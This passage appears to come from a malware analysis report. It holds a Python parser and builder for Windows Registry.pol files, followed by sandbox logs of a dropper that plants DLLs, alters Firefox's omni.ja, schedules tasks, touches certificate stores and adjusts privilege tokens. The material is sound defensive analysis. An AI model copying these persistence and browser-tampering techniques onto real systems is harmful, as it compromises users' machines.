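        return _u16('\0'.join(value) + '\0\0')
    raise ValueError(f'unsupported type {rtype}')


def decode_data(rtype, data: bytes):
    """Inverse of encode_data; unknown types come back as raw bytes."""
    if rtype == REG_DWORD:
        return struct.unpack('<I', data)[0]
    if rtype == REG_SZ:
        return data.decode('utf-16-le').rstrip('\0')
    if rtype == REG_MULTI_SZ:
        return [s for s in data.decode('utf-16-le').split('\0') if s]
    return data


def build_pol(entries) -> bytes:
    """Serialize (key, value_name, type, raw_data) tuples as a PReg v1 blob."""
    out = bytearray(b'PReg' + struct.pack('<I', 1))
    for key, name, rtype, data in entries:
        out += _u16('[') + _u16(key + '\0') + _u16(';') + _u16(name + '\0') + _u16(';')
        out += struct.pack('<I', rtype) + _u16(';') + struct.pack('<I', len(data)) + _u16(';')
        out += data + _u16(']')
    return bytes(out)


def parse_pol(blob: bytes):
    """Parse a Registry.pol blob into [(key, value_name, type, value), ...]."""
    if blob[:4] != b'PReg' or struct.unpack_from('<I', blob, 4)[0] != 1:
        raise ValueError('not a PReg version 1 file')
    pos, entries = 8, []

    def expect(ch):
        nonlocal pos
        if blob[pos:pos + 2] != _u16(ch):
            raise ValueError(f'expected {ch!r} at offset {pos}')
        pos += 2

    def read_str():
        nonlocal pos
        end = blob.index(b'\0\0', pos)
        while (end - pos) % 2:            # terminator must sit on a UTF-16 boundary
            end = blob.index(b'\0\0', end + 1)
        s = blob[pos:end].decode('utf-16-le')
        pos = end + 2
        return s

    while pos < len(blob):
        expect('[')
        key = read_str(); expect(';')
        name = read_str(); expect(';')
        rtype = struct.unpack_from('<I', blob, pos)[0]; pos += 4; expect(';')
        size = struct.unpack_from('<I', blob, pos)[0]; pos += 4; expect(';')
        data = blob[pos:pos + size]; pos += size
        expect(']')
        entries.append((key, name, rtype, decode_data(rtype, data)))
    return entries


# Constructed placeholder policy; NOT the contents the sample wrote.
SAMPLE_ENTRIES = [
    (r'Software\Policies\Microsoft\Windows\WindowsUpdate\AU', 'NoAutoUpdate', REG_DWORD, 1),
    (r'Software\Policies\Microsoft\Edge', 'HomepageLocation', REG_SZ, 'http://example.invalid/'),
    (r'Software\Policies\Example', 'HypotheticalList', REG_MULTI_SZ, ['alpha', 'beta']),
]
SAMPLE_POL = build_pol([(k, n, t, encode_data(t, v)) for k, n, t, v in SAMPLE_ENTRIES])

if __name__ == '__main__':
    import sys
    blob = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 else SAMPLE_POL
    for key, name, rtype, value in parse_pol(blob):
        print(f'{key}\\{name} (type {rtype}) = {value!r}')
```

Run it with the path to a copy of `C:\Windows\System32\GroupPolicy\Machine\Registry.pol` taken from an affected host; with no argument it parses the constructed sample. The same records can also be listed on the host with `gpresult /h`, but that shows the policy after the engine has interpreted it, whereas the raw file shows exactly which keys the dropper chose to write.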

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\YrliKKkuhgWU2\IDhYlhm.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\ycfBUKIjHxeOC\wxdYbvp.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\ycfBUKIjHxeOC\PxTyDEW.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\YrliKKkuhgWU2\bICytrPDqVyEw.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\XWITLon.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\orRvbnhdU\IyrDVE.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\rkxrljj.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\orRvbnhdU\HJtjZab.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\IgAQuzzvNCUn\wvuTXUU.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bEcIFlOHxifjjBuFoU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\aUYdFpynDtMaquqaO.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\yozVwwMRZiDXbVH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\YGcJOiVocZfwUgdee.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "2" C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
